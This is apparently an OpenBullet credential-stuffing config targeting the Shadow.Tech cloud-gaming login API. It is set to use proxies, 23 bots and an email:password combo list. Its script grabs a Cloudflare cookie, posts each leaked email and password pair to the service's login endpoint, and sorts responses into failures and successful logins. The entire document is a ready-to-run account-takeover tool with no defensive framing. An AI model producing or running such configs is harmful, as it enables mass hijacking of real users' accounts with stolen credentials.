[SETTINGS]
{
  "Name": "Shadow.Tech",
  "SuggestedBots": 23,
  "LastModified": "2018-10-08T20:34:50.0540115+00:00",
  "AdditionalInfo": "@displine",
  "Author": "TomKirkman",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://sso.shadow.tech/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "text/html; charset=utf-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://shadow.tech/int" 
PARSE "<COOKIES(__cfduid)>" LR "" "" Recursive=FALSE -> VAR "CLOUD" "" "" 
REQUEST POST "https://sso.api-web.shadow.tech/api/v1/user/login" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "origin: https://sso.shadow.tech" 
  HEADER "referer: https://sso.shadow.tech/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "success\":false" 
  KEYCHAIN Success OR 
    KEY "" 
